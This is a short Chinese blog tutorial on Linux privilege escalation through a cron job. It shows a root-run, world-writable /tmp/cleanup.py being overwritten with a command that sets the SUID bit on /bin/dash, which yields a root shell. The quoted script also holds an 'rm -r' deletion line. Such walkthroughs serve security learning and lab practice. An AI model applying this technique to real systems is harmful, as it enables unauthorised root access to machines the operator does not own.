欢迎来到【血梦博客】 今天是:2020年08月09日 星期日
站长联系QQ:635948183
当前位置: 网站首页> 提权教程> 提权教程:LINUX CRON JOBS 提权

提权教程:LINUX CRON JOBS 提权

作者:血梦 日期:2020-03-17 浏览:100分类: 提权教程 已提交百度收录

Cron Jobs 计划任务通过 /etc/crontab 文件,可以设定系统定期执行的任务。

crontab 文件只能是root权限 进行编辑

我们得到一个非root权限的远程登录用户的时候

查看/etc/crontab 内容文件

 

发现存在

1.png


每两分钟执行一次文件

找到 /tmp/cleanup.py

 

cat /tmp/cleanup.py

 

2.png

#!/usr/bin/env python

import os

import sys

try:

       os.system('rm -r  /home/moonteam/cleanup/*')

except:

    sys.exit()


两分钟执行一次文件 删除cleanup目录下全部文件

 

3png.png

查看权限

ls -al


修改内容

os.system('chmod u+s /bin/dash')

 

4.png把 /bin/dash设置SUID权限  运行之后就会得到 root权限

使用命令dash

5.png

关灯